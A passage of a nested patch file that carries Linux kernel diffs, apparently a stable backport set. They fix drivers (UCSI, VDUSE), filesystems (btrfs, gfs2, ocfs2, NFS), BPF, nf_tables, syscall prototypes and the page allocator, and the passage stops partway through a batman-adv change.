+--- a/drivers/usb/typec/ucsi/ucsi_stm32g0.c
++++ b/drivers/usb/typec/ucsi/ucsi_stm32g0.c
+@@ -64,6 +64,7 @@ struct ucsi_stm32g0 {
+ 	struct completion complete;
+ 	struct device *dev;
+ 	unsigned long flags;
++#define ACK_PENDING	2
+ 	const char *fw_name;
+ 	struct ucsi *ucsi;
+ 	bool suspended;
+@@ -395,9 +396,13 @@ static int ucsi_stm32g0_sync_write(struct ucsi *ucsi, unsigned int offset, const
+ 				   size_t len)
+ {
+ 	struct ucsi_stm32g0 *g0 = ucsi_get_drvdata(ucsi);
++	bool ack = UCSI_COMMAND(*(u64 *)val) == UCSI_ACK_CC_CI;
+ 	int ret;
+ 
+-	set_bit(COMMAND_PENDING, &g0->flags);
++	if (ack)
++		set_bit(ACK_PENDING, &g0->flags);
++	else
++		set_bit(COMMAND_PENDING, &g0->flags);
+ 
+ 	ret = ucsi_stm32g0_async_write(ucsi, offset, val, len);
+ 	if (ret)
+@@ -405,9 +410,14 @@ static int ucsi_stm32g0_sync_write(struct ucsi *ucsi, unsigned int offset, const
+ 
+ 	if (!wait_for_completion_timeout(&g0->complete, msecs_to_jiffies(5000)))
+ 		ret = -ETIMEDOUT;
++	else
++		return 0;
+ 
+ out_clear_bit:
+-	clear_bit(COMMAND_PENDING, &g0->flags);
++	if (ack)
++		clear_bit(ACK_PENDING, &g0->flags);
++	else
++		clear_bit(COMMAND_PENDING, &g0->flags);
+ 
+ 	return ret;
+ }
+@@ -428,8 +438,9 @@ static irqreturn_t ucsi_stm32g0_irq_handler(int irq, void *data)
+ 	if (UCSI_CCI_CONNECTOR(cci))
+ 		ucsi_connector_change(g0->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+-	if (test_bit(COMMAND_PENDING, &g0->flags) &&
+-	    cci & (UCSI_CCI_ACK_COMPLETE | UCSI_CCI_COMMAND_COMPLETE))
++	if (cci & UCSI_CCI_ACK_COMPLETE && test_and_clear_bit(ACK_PENDING, &g0->flags))
++		complete(&g0->complete);
++	if (cci & UCSI_CCI_COMMAND_COMPLETE && test_and_clear_bit(COMMAND_PENDING, &g0->flags))
+ 		complete(&g0->complete);
+ 
+ 	return IRQ_HANDLED;
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index edcd74cc4c0f7..0ccece3f4f7da 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -8,6 +8,7 @@
+  *
+  */
+ 
++#include "linux/virtio_net.h"
+ #include <linux/init.h>
+ #include <linux/module.h>
+ #include <linux/cdev.h>
+@@ -28,6 +29,7 @@
+ #include <uapi/linux/virtio_config.h>
+ #include <uapi/linux/virtio_ids.h>
+ #include <uapi/linux/virtio_blk.h>
++#include <uapi/linux/virtio_ring.h>
+ #include <linux/mod_devicetable.h>
+ 
+ #include "iova_domain.h"
+@@ -1416,13 +1418,17 @@ static bool device_is_allowed(u32 device_id)
+ 	return false;
+ }
+ 
+-static bool features_is_valid(u64 features)
++static bool features_is_valid(struct vduse_dev_config *config)
+ {
+-	if (!(features & (1ULL << VIRTIO_F_ACCESS_PLATFORM)))
++	if (!(config->features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)))
+ 		return false;
+ 
+ 	/* Now we only support read-only configuration space */
+-	if (features & (1ULL << VIRTIO_BLK_F_CONFIG_WCE))
++	if ((config->device_id == VIRTIO_ID_BLOCK) &&
++			(config->features & BIT_ULL(VIRTIO_BLK_F_CONFIG_WCE)))
++		return false;
++	else if ((config->device_id == VIRTIO_ID_NET) &&
++			(config->features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ)))
+ 		return false;
+ 
+ 	return true;
+@@ -1449,7 +1455,7 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+-	if (!features_is_valid(config->features))
++	if (!features_is_valid(config))
+ 		return false;
+ 
+ 	return true;
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index b27795e13ff31..862a222caab33 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2676,7 +2676,7 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	u64 offset = bytenr - block_group->start;
+ 	u64 to_free, to_unusable;
+ 	int bg_reclaim_threshold = 0;
+-	bool initial = (size == block_group->length);
++	bool initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
+ 	u64 reclaimable_unusable;
+ 
+ 	WARN_ON(!initial && offset + size > block_group->zone_capacity);
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 302d1e43d7012..6107cd680176c 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -591,6 +591,8 @@ static void gfs2_put_super(struct super_block *sb)
+ 
+ 	if (!sb_rdonly(sb)) {
+ 		gfs2_make_fs_ro(sdp);
++	} else {
++		gfs2_quota_cleanup(sdp);
+ 	}
+ 	WARN_ON(gfs2_withdrawing(sdp));
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index b555efca01d20..f16b13ba4204a 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -131,8 +131,6 @@ int nfs_swap_rw(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	ssize_t ret;
+ 
+-	VM_BUG_ON(iov_iter_count(iter) != PAGE_SIZE);
+-
+ 	if (iov_iter_rw(iter) == READ)
+ 		ret = nfs_file_direct_read(iocb, iter, true);
+ 	else
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 0394505fdce3f..e94a5a9fec012 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -2370,6 +2370,11 @@ static int ocfs2_dio_end_io_write(struct inode *inode,
+ 	}
+ 
+ 	list_for_each_entry(ue, &dwc->dw_zero_list, ue_node) {
++		ret = ocfs2_assure_trans_credits(handle, credits);
++		if (ret < 0) {
++			mlog_errno(ret);
++			break;
++		}
+ 		ret = ocfs2_mark_extent_written(inode, &et, handle,
+ 						ue->ue_cpos, 1,
+ 						ue->ue_phys,
+diff --git a/fs/ocfs2/journal.c b/fs/ocfs2/journal.c
+index 3fb98b4569a28..7d6843d78c84c 100644
+--- a/fs/ocfs2/journal.c
++++ b/fs/ocfs2/journal.c
+@@ -447,6 +447,23 @@ int ocfs2_extend_trans(handle_t *handle, int nblocks)
+ 	return status;
+ }
+ 
++/*
++ * Make sure handle has at least 'nblocks' credits available. If it does not
++ * have that many credits available, we will try to extend the handle to have
++ * enough credits. If that fails, we will restart transaction to have enough
++ * credits. Similar notes regarding data consistency and locking implications
++ * as for ocfs2_extend_trans() apply here.
++ */
++int ocfs2_assure_trans_credits(handle_t *handle, int nblocks)
++{
++	int old_nblks = jbd2_handle_buffer_credits(handle);
++
++	trace_ocfs2_assure_trans_credits(old_nblks);
++	if (old_nblks >= nblocks)
++		return 0;
++	return ocfs2_extend_trans(handle, nblocks - old_nblks);
++}
++
+ /*
+  * If we have fewer than thresh credits, extend by OCFS2_MAX_TRANS_DATA.
+  * If that fails, restart the transaction & regain write access for the
+diff --git a/fs/ocfs2/journal.h b/fs/ocfs2/journal.h
+index 41c382f68529e..689c340c6363d 100644
+--- a/fs/ocfs2/journal.h
++++ b/fs/ocfs2/journal.h
+@@ -243,6 +243,8 @@ handle_t		    *ocfs2_start_trans(struct ocfs2_super *osb,
+ int			     ocfs2_commit_trans(struct ocfs2_super *osb,
+ 						handle_t *handle);
+ int			     ocfs2_extend_trans(handle_t *handle, int nblocks);
++int			     ocfs2_assure_trans_credits(handle_t *handle,
++						int nblocks);
+ int			     ocfs2_allocate_extend_trans(handle_t *handle,
+ 						int thresh);
+ 
+diff --git a/fs/ocfs2/ocfs2_trace.h b/fs/ocfs2/ocfs2_trace.h
+index dc4bce1649c1b..7a9cfd61145a0 100644
+--- a/fs/ocfs2/ocfs2_trace.h
++++ b/fs/ocfs2/ocfs2_trace.h
+@@ -2578,6 +2578,8 @@ DEFINE_OCFS2_ULL_UINT_EVENT(ocfs2_commit_cache_end);
+ 
+ DEFINE_OCFS2_INT_INT_EVENT(ocfs2_extend_trans);
+ 
++DEFINE_OCFS2_INT_EVENT(ocfs2_assure_trans_credits);
++
+ DEFINE_OCFS2_INT_EVENT(ocfs2_extend_trans_restart);
+ 
+ DEFINE_OCFS2_INT_INT_EVENT(ocfs2_allocate_extend_trans);
+diff --git a/fs/open.c b/fs/open.c
+index 51dc46620d033..0d63c94e1c5e6 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -199,13 +199,13 @@ long do_sys_ftruncate(unsigned int fd, loff_t length, int small)
+ 	return error;
+ }
+ 
+-SYSCALL_DEFINE2(ftruncate, unsigned int, fd, unsigned long, length)
++SYSCALL_DEFINE2(ftruncate, unsigned int, fd, off_t, length)
+ {
+ 	return do_sys_ftruncate(fd, length, 1);
+ }
+ 
+ #ifdef CONFIG_COMPAT
+-COMPAT_SYSCALL_DEFINE2(ftruncate, unsigned int, fd, compat_ulong_t, length)
++COMPAT_SYSCALL_DEFINE2(ftruncate, unsigned int, fd, compat_off_t, length)
+ {
+ 	return do_sys_ftruncate(fd, length, 1);
+ }
+diff --git a/include/linux/compat.h b/include/linux/compat.h
+index 594357881b0b3..77e84d17521eb 100644
+--- a/include/linux/compat.h
++++ b/include/linux/compat.h
+@@ -621,7 +621,7 @@ asmlinkage long compat_sys_fstatfs(unsigned int fd,
+ asmlinkage long compat_sys_fstatfs64(unsigned int fd, compat_size_t sz,
+ 				     struct compat_statfs64 __user *buf);
+ asmlinkage long compat_sys_truncate(const char __user *, compat_off_t);
+-asmlinkage long compat_sys_ftruncate(unsigned int, compat_ulong_t);
++asmlinkage long compat_sys_ftruncate(unsigned int, compat_off_t);
+ /* No generic prototype for truncate64, ftruncate64, fallocate */
+ asmlinkage long compat_sys_openat(int dfd, const char __user *filename,
+ 				  int flags, umode_t mode);
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index de6d6558a4d30..a849b533be5b1 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -709,18 +709,10 @@ static inline efi_status_t efi_query_variable_store(u32 attributes,
+ #endif
+ extern void __iomem *efi_lookup_mapped_addr(u64 phys_addr);
+ 
+-extern int __init efi_memmap_alloc(unsigned int num_entries,
+-				   struct efi_memory_map_data *data);
+-extern void __efi_memmap_free(u64 phys, unsigned long size,
+-			      unsigned long flags);
++extern int __init __efi_memmap_init(struct efi_memory_map_data *data);
+ extern int __init efi_memmap_init_early(struct efi_memory_map_data *data);
+ extern int __init efi_memmap_init_late(phys_addr_t addr, unsigned long size);
+ extern void __init efi_memmap_unmap(void);
+-extern int __init efi_memmap_install(struct efi_memory_map_data *data);
+-extern int __init efi_memmap_split_count(efi_memory_desc_t *md,
+-					 struct range *range);
+-extern void __init efi_memmap_insert(struct efi_memory_map *old_memmap,
+-				     void *buf, struct efi_mem_range *mem);
+ 
+ #ifdef CONFIG_EFI_ESRT
+ extern void __init efi_esrt_init(void);
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index face590b24e17..01f97956572ce 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -850,14 +850,15 @@ bpf_ctx_narrow_access_offset(u32 off, u32 size, u32 size_default)
+ 
+ #define bpf_classic_proglen(fprog) (fprog->len * sizeof(fprog->filter[0]))
+ 
+-static inline void bpf_prog_lock_ro(struct bpf_prog *fp)
++static inline int __must_check bpf_prog_lock_ro(struct bpf_prog *fp)
+ {
+ #ifndef CONFIG_BPF_JIT_ALWAYS_ON
+ 	if (!fp->jited) {
+ 		set_vm_flush_reset_perms(fp);
+-		set_memory_ro((unsigned long)fp, fp->pages);
++		return set_memory_ro((unsigned long)fp, fp->pages);
+ 	}
+ #endif
++	return 0;
+ }
+ 
+ static inline void bpf_jit_binary_lock_ro(struct bpf_binary_header *hdr)
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index dce105f67b4d8..160230bb1a9ce 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4608,7 +4608,7 @@ static inline bool ieee80211_mle_size_ok(const u8 *data, u8 len)
+ 	bool check_common_len = false;
+ 	u16 control;
+ 
+-	if (len < fixed)
++	if (!data || len < fixed)
+ 		return false;
+ 
+ 	control = le16_to_cpu(mle->control);
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 3b9f4d7c40c38..93d2003091222 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -552,13 +552,12 @@ enum zone_watermarks {
+ };
+ 
+ /*
+- * One per migratetype for each PAGE_ALLOC_COSTLY_ORDER. One additional list
+- * for THP which will usually be GFP_MOVABLE. Even if it is another type,
+- * it should not contribute to serious fragmentation causing THP allocation
+- * failures.
++ * One per migratetype for each PAGE_ALLOC_COSTLY_ORDER. Two additional lists
++ * are added for THP. One PCP list is used by GPF_MOVABLE, and the other PCP list
++ * is used by GFP_UNMOVABLE and GFP_RECLAIMABLE.
+  */
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+-#define NR_PCP_THP 1
++#define NR_PCP_THP 2
+ #else
+ #define NR_PCP_THP 0
+ #endif
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index e6fb36b71b59d..15086715632e0 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -90,8 +90,8 @@ enum {
+ 	NVMF_RDMA_QPTYPE_DATAGRAM	= 2, /* Reliable Datagram */
+ };
+ 
+-/* RDMA QP Service Type codes for Discovery Log Page entry TSAS
+- * RDMA_QPTYPE field
++/* RDMA Provider Type codes for Discovery Log Page entry TSAS
++ * RDMA_PRTYPE field
+  */
+ enum {
+ 	NVMF_RDMA_PRTYPE_NOT_SPECIFIED	= 1, /* No Provider Specified */
+diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h
+index 27a6ba1c0ec4e..dcce762b48fac 100644
+--- a/include/linux/syscalls.h
++++ b/include/linux/syscalls.h
+@@ -450,7 +450,7 @@ asmlinkage long sys_fstatfs(unsigned int fd, struct statfs __user *buf);
+ asmlinkage long sys_fstatfs64(unsigned int fd, size_t sz,
+ 				struct statfs64 __user *buf);
+ asmlinkage long sys_truncate(const char __user *path, long length);
+-asmlinkage long sys_ftruncate(unsigned int fd, unsigned long length);
++asmlinkage long sys_ftruncate(unsigned int fd, off_t length);
+ #if BITS_PER_LONG == 32
+ asmlinkage long sys_truncate64(const char __user *path, loff_t length);
+ asmlinkage long sys_ftruncate64(unsigned int fd, loff_t length);
+@@ -960,9 +960,15 @@ asmlinkage long sys_prlimit64(pid_t pid, unsigned int resource,
+ 				const struct rlimit64 __user *new_rlim,
+ 				struct rlimit64 __user *old_rlim);
+ asmlinkage long sys_fanotify_init(unsigned int flags, unsigned int event_f_flags);
++#if defined(CONFIG_ARCH_SPLIT_ARG64)
++asmlinkage long sys_fanotify_mark(int fanotify_fd, unsigned int flags,
++                                unsigned int mask_1, unsigned int mask_2,
++				int dfd, const char  __user * pathname);
++#else
+ asmlinkage long sys_fanotify_mark(int fanotify_fd, unsigned int flags,
+ 				  u64 mask, int fd,
+ 				  const char  __user *pathname);
++#endif
+ asmlinkage long sys_name_to_handle_at(int dfd, const char __user *name,
+ 				      struct file_handle __user *handle,
+ 				      int __user *mnt_id, int flag);
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index 8132f330306db..4242f863f5601 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -263,7 +263,7 @@ struct dst_entry *inet_csk_route_child_sock(const struct sock *sk,
+ struct sock *inet_csk_reqsk_queue_add(struct sock *sk,
+ 				      struct request_sock *req,
+ 				      struct sock *child);
+-void inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
++bool inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
+ 				   unsigned long timeout);
+ struct sock *inet_csk_complete_hashdance(struct sock *sk, struct sock *child,
+ 					 struct request_sock *req,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 2fa344cb66f60..9a80d0251d8f3 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -582,6 +582,11 @@ static inline void *nft_set_priv(const struct nft_set *set)
+ 	return (void *)set->data;
+ }
+ 
++static inline enum nft_data_types nft_set_datatype(const struct nft_set *set)
++{
++	return set->dtype == NFT_DATA_VERDICT ? NFT_DATA_VERDICT : NFT_DATA_VALUE;
++}
++
+ static inline bool nft_set_gc_is_pending(const struct nft_set *s)
+ {
+ 	return refcount_read(&s->refs) != 1;
+@@ -784,10 +789,16 @@ static inline struct nft_set_elem_expr *nft_set_ext_expr(const struct nft_set_ex
+ 	return nft_set_ext(ext, NFT_SET_EXT_EXPRESSIONS);
+ }
+ 
+-static inline bool nft_set_elem_expired(const struct nft_set_ext *ext)
++static inline bool __nft_set_elem_expired(const struct nft_set_ext *ext,
++					  u64 tstamp)
+ {
+ 	return nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION) &&
+-	       time_is_before_eq_jiffies64(*nft_set_ext_expiration(ext));
++	       time_after_eq64(tstamp, *nft_set_ext_expiration(ext));
++}
++
++static inline bool nft_set_elem_expired(const struct nft_set_ext *ext)
++{
++	return __nft_set_elem_expired(ext, get_jiffies_64());
+ }
+ 
+ static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
+@@ -1711,6 +1722,7 @@ struct nftables_pernet {
+ 	struct list_head	notify_list;
+ 	struct mutex		commit_mutex;
+ 	u64			table_handle;
++	u64			tstamp;
+ 	unsigned int		base_seq;
+ 	u8			validate_state;
+ 	unsigned int		gc_seq;
+@@ -1723,6 +1735,11 @@ static inline struct nftables_pernet *nft_pernet(const struct net *net)
+ 	return net_generic(net, nf_tables_net_id);
+ }
+ 
++static inline u64 nft_net_tstamp(const struct net *net)
++{
++	return nft_pernet(net)->tstamp;
++}
++
+ #define __NFT_REDUCE_READONLY	1UL
+ #define NFT_REDUCE_READONLY	(void *)__NFT_REDUCE_READONLY
+ 
+diff --git a/include/trace/events/qdisc.h b/include/trace/events/qdisc.h
+index 1f4258308b967..061fd49603035 100644
+--- a/include/trace/events/qdisc.h
++++ b/include/trace/events/qdisc.h
+@@ -81,14 +81,14 @@ TRACE_EVENT(qdisc_reset,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	dev,		qdisc_dev(q) ? qdisc_dev(q)->name : "(null)"	)
+ 		__string(	kind,		q->ops->id		)
+ 		__field(	u32,		parent			)
+ 		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q)->name);
++		__assign_str(dev, qdisc_dev(q) ? qdisc_dev(q)->name : "(null)");
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+diff --git a/include/uapi/asm-generic/unistd.h b/include/uapi/asm-generic/unistd.h
+index 45fa180cc56ad..28973a89cdc7f 100644
+--- a/include/uapi/asm-generic/unistd.h
++++ b/include/uapi/asm-generic/unistd.h
+@@ -805,7 +805,7 @@ __SC_COMP(__NR_pselect6_time64, sys_pselect6, compat_sys_pselect6_time64)
+ #define __NR_ppoll_time64 414
+ __SC_COMP(__NR_ppoll_time64, sys_ppoll, compat_sys_ppoll_time64)
+ #define __NR_io_pgetevents_time64 416
+-__SYSCALL(__NR_io_pgetevents_time64, sys_io_pgetevents)
++__SC_COMP(__NR_io_pgetevents_time64, sys_io_pgetevents, compat_sys_io_pgetevents_time64)
+ #define __NR_recvmmsg_time64 417
+ __SC_COMP(__NR_recvmmsg_time64, sys_recvmmsg, compat_sys_recvmmsg_time64)
+ #define __NR_mq_timedsend_time64 418
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 44abf88e1bb0d..0ea0d50a7c161 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -2034,6 +2034,7 @@ static unsigned int PROG_NAME(stack_size)(const void *ctx, const struct bpf_insn
+ 	u64 stack[stack_size / sizeof(u64)]; \
+ 	u64 regs[MAX_BPF_EXT_REG] = {}; \
+ \
++	kmsan_unpoison_memory(stack, sizeof(stack)); \
+ 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; \
+ 	ARG1 = (u64) (unsigned long) ctx; \
+ 	return ___bpf_prog_run(regs, insn); \
+@@ -2047,6 +2048,7 @@ static u64 PROG_NAME_ARGS(stack_size)(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5, \
+ 	u64 stack[stack_size / sizeof(u64)]; \
+ 	u64 regs[MAX_BPF_EXT_REG]; \
+ \
++	kmsan_unpoison_memory(stack, sizeof(stack)); \
+ 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; \
+ 	BPF_R1 = r1; \
+ 	BPF_R2 = r2; \
+@@ -2223,7 +2225,9 @@ struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
+ 	}
+ 
+ finalize:
+-	bpf_prog_lock_ro(fp);
++	*err = bpf_prog_lock_ro(fp);
++	if (*err)
++		return fp;
+ 
+ 	/* The tail call compatibility check can only be done at
+ 	 * this late stage as we need to determine, if we deal
+diff --git a/kernel/bpf/ringbuf.c b/kernel/bpf/ringbuf.c
+index 9e832acf46925..a1911391a864c 100644
+--- a/kernel/bpf/ringbuf.c
++++ b/kernel/bpf/ringbuf.c
+@@ -59,7 +59,8 @@ struct bpf_ringbuf {
+ 	 * This prevents a user-space application from modifying the
+ 	 * position and ruining in-kernel tracking. The permissions of the
+ 	 * pages depend on who is producing samples: user-space or the
+-	 * kernel.
++	 * kernel. Note that the pending counter is placed in the same
++	 * page as the producer, so that it shares the same cache line.
+ 	 *
+ 	 * Kernel-producer
+ 	 * ---------------
+@@ -78,6 +79,7 @@ struct bpf_ringbuf {
+ 	 */
+ 	unsigned long consumer_pos __aligned(PAGE_SIZE);
+ 	unsigned long producer_pos __aligned(PAGE_SIZE);
++	unsigned long pending_pos;
+ 	char data[] __aligned(PAGE_SIZE);
+ };
+ 
+@@ -176,6 +178,7 @@ static struct bpf_ringbuf *bpf_ringbuf_alloc(size_t data_sz, int numa_node)
+ 	rb->mask = data_sz - 1;
+ 	rb->consumer_pos = 0;
+ 	rb->producer_pos = 0;
++	rb->pending_pos = 0;
+ 
+ 	return rb;
+ }
+@@ -390,9 +393,9 @@ bpf_ringbuf_restore_from_rec(struct bpf_ringbuf_hdr *hdr)
+ 
+ static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
+ {
+-	unsigned long cons_pos, prod_pos, new_prod_pos, flags;
+-	u32 len, pg_off;
++	unsigned long cons_pos, prod_pos, new_prod_pos, pend_pos, flags;
+ 	struct bpf_ringbuf_hdr *hdr;
++	u32 len, pg_off, tmp_size, hdr_len;
+ 
+ 	if (unlikely(size > RINGBUF_MAX_RECORD_SZ))
+ 		return NULL;
+@@ -410,13 +413,29 @@ static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
+ 		spin_lock_irqsave(&rb->spinlock, flags);
+ 	}
+ 
++	pend_pos = rb->pending_pos;
+ 	prod_pos = rb->producer_pos;
+ 	new_prod_pos = prod_pos + len;
+ 
+-	/* check for out of ringbuf space by ensuring producer position
+-	 * doesn't advance more than (ringbuf_size - 1) ahead
++	while (pend_pos < prod_pos) {
++		hdr = (void *)rb->data + (pend_pos & rb->mask);
++		hdr_len = READ_ONCE(hdr->len);
++		if (hdr_len & BPF_RINGBUF_BUSY_BIT)
++			break;
++		tmp_size = hdr_len & ~BPF_RINGBUF_DISCARD_BIT;
++		tmp_size = round_up(tmp_size + BPF_RINGBUF_HDR_SZ, 8);
++		pend_pos += tmp_size;
++	}
++	rb->pending_pos = pend_pos;
++
++	/* check for out of ringbuf space:
++	 * - by ensuring producer position doesn't advance more than
++	 *   (ringbuf_size - 1) ahead
++	 * - by ensuring oldest not yet committed record until newest
++	 *   record does not span more than (ringbuf_size - 1)
+ 	 */
+-	if (new_prod_pos - cons_pos > rb->mask) {
++	if (new_prod_pos - cons_pos > rb->mask ||
++	    new_prod_pos - pend_pos > rb->mask) {
+ 		spin_unlock_irqrestore(&rb->spinlock, flags);
+ 		return NULL;
+ 	}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 1d851e2f48590..56a5c8beb553d 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -14113,10 +14113,14 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	 * bpf_prog_load will add the kallsyms for the main program.
+ 	 */
+ 	for (i = 1; i < env->subprog_cnt; i++) {
+-		bpf_prog_lock_ro(func[i]);
+-		bpf_prog_kallsyms_add(func[i]);
++		err = bpf_prog_lock_ro(func[i]);
++		if (err)
++			goto out_free;
+ 	}
+ 
++	for (i = 1; i < env->subprog_cnt; i++)
++		bpf_prog_kallsyms_add(func[i]);
++
+ 	/* Last step: make now unused interpreter insns from main
+ 	 * prog consistent for later dump requests, so they can
+ 	 * later look the same as if they were interpreted only.
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index e0e09b700b430..4044e4d80cbb0 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2116,7 +2116,7 @@ EXPORT_SYMBOL_GPL(__cpuhp_state_add_instance);
+  * The caller needs to hold cpus read locked while calling this function.
+  * Return:
+  *   On success:
+- *      Positive state number if @state is CPUHP_AP_ONLINE_DYN;
++ *      Positive state number if @state is CPUHP_AP_ONLINE_DYN or CPUHP_BP_PREPARE_DYN;
+  *      0 for all other states
+  *   On failure: proper (negative) error code
+  */
+@@ -2139,7 +2139,7 @@ int __cpuhp_setup_state_cpuslocked(enum cpuhp_state state,
+ 	ret = cpuhp_store_callbacks(state, name, startup, teardown,
+ 				    multi_instance);
+ 
+-	dynstate = state == CPUHP_AP_ONLINE_DYN;
++	dynstate = state == CPUHP_AP_ONLINE_DYN || state == CPUHP_BP_PREPARE_DYN;
+ 	if (ret > 0 && dynstate) {
+ 		state = ret;
+ 		ret = 0;
+@@ -2170,8 +2170,8 @@ int __cpuhp_setup_state_cpuslocked(enum cpuhp_state state,
+ out:
+ 	mutex_unlock(&cpuhp_state_mutex);
+ 	/*
+-	 * If the requested state is CPUHP_AP_ONLINE_DYN, return the
+-	 * dynamically allocated state in case of success.
++	 * If the requested state is CPUHP_AP_ONLINE_DYN or CPUHP_BP_PREPARE_DYN,
++	 * return the dynamically allocated state in case of success.
+ 	 */
+ 	if (!ret && dynstate)
+ 		return state;
+diff --git a/kernel/sys_ni.c b/kernel/sys_ni.c
+index 860b2dcf3ac46..f4922c60a615b 100644
+--- a/kernel/sys_ni.c
++++ b/kernel/sys_ni.c
+@@ -46,8 +46,8 @@ COND_SYSCALL(io_getevents_time32);
+ COND_SYSCALL(io_getevents);
+ COND_SYSCALL(io_pgetevents_time32);
+ COND_SYSCALL(io_pgetevents);
+-COND_SYSCALL_COMPAT(io_pgetevents_time32);
+ COND_SYSCALL_COMPAT(io_pgetevents);
++COND_SYSCALL_COMPAT(io_pgetevents_time64);
+ COND_SYSCALL(io_uring_setup);
+ COND_SYSCALL(io_uring_enter);
+ COND_SYSCALL(io_uring_register);
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index a7537da43bd45..12412263d131e 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -705,12 +705,16 @@ static void bad_page(struct page *page, const char *reason)
+ 
+ static inline unsigned int order_to_pindex(int migratetype, int order)
+ {
++	bool __maybe_unused movable;
+ 	int base = order;
+ 
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ 	if (order > PAGE_ALLOC_COSTLY_ORDER) {
+ 		VM_BUG_ON(order != pageblock_order);
+-		return NR_LOWORDER_PCP_LISTS;
++
++		movable = migratetype == MIGRATE_MOVABLE;
++
++		return NR_LOWORDER_PCP_LISTS + movable;
+ 	}
+ #else
+ 	VM_BUG_ON(order > PAGE_ALLOC_COSTLY_ORDER);
+@@ -724,7 +728,7 @@ static inline int pindex_to_order(unsigned int pindex)
+ 	int order = pindex / MIGRATE_PCPTYPES;
+ 
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+-	if (pindex == NR_LOWORDER_PCP_LISTS)
++	if (pindex >= NR_LOWORDER_PCP_LISTS)
+ 		order = pageblock_order;
+ #else
+ 	VM_BUG_ON(order > PAGE_ALLOC_COSTLY_ORDER);
+diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c
+index dafef3a78ad5d..7388d2ad7b5d8 100644
+--- a/net/batman-adv/originator.c
++++ b/net/batman-adv/originator.c
+@@ -12,6 +12,7 @@
+ #include <linux/errno.h>
+ #include <linux/etherdevice.h>
+ #include <linux/gfp.h>
++#include <linux/if_vlan.h>
+ #include <linux/jiffies.h>
+ #include <linux/kref.h>
+ #include <linux/list.h>
+@@ -131,6 +132,29 @@ batadv_orig_node_vlan_get(struct batadv_orig_node *orig_node,
+ 	return vlan;
+ }
+ 
++/**
++ * batadv_vlan_id_valid() - check if vlan id is in valid batman-adv encoding
++ * @vid: the VLAN identifier
++ *
++ * Return: true when either no vlan is set or if VLAN is in correct range,
++ *  false otherwise
++ */
++static bool batadv_vlan_id_valid(unsigned short vid)
++{
